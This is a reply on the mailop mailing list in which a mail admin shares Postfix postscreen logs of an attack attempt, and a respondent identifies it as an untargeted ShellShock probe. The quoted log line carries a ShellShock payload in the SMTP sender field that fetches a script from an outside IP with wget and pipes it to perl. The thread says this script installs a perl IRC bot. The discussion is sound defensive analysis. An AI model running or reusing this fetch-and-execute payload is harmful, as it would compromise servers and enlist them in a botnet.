On 2023-01-14 at 09:16:05 UTC-0500 (Sat, 14 Jan 2023 16:16:05 +0200)
Mary via mailop <[email protected]>
is rumored to have said:
Within the past several days, I've been monitoring a kind of exploit
that affects the 'from' RCPT part of the smtp conversation:
```
postfix/postscreen[633104]: PREGREET 8 after 0.09 from
[159.89.232.70]:52350: HELO x\r\n
postfix/postscreen[633104]: NOQUEUE: reject: RCPT from
[159.89.232.70]:52350: 550 5.5.1 Protocol error; from=<() { :; }; wget
-qO - 193.56.28.202/botF|perl>, to=<root>, proto=SMTP, helo=<x>
postfix/postscreen[633104]: DATA without valid RCPT from
[159.89.232.70]:52350
```
Does anyone know what kind of software is the target of this attack?
It's a very lame attempt to exploit ShellShock. "Very lame" because that
vulnerability is surely saturated by now (i.e. all vulnerable systems
were popped years ago) and it didn't wait for the banner or give a
minimally valid HELO, behavior that good mailservers have been shunning
for almost 20 years now.
It's a demo in "spammers & malware users are generally stupid."
Obviously, its not postfix, which quickly drops the connection. Could
it be some kind of software that parses logs?
Hard to say, since obviously they also had more payload (else why try
DATA?)
ShellShock attacks are grossly untargeted because the ways that mail
(and web) servers make themselves vulnerable by errors in configuration
are widely variable. They don't care if a particular MTA is Postfix 3.7
or Sendmail 5.2, because some mail admin might have had a lapse in
configuration rigor on either.
I'd appreciate your thoughts.
PS:
the payload is a perl IRC bot
_______________________________________________
mailop mailing list
[email protected]
https://list.mailop.org/listinfo/mailop
--
Bill Cole
[email protected] or [email protected]
(AKA @grumpybozo and many *@billmail.scconsult.com addresses)
Not Currently Available For Hire
_______________________________________________
mailop mailing list
[email protected]
https://list.mailop.org/listinfo/mailop
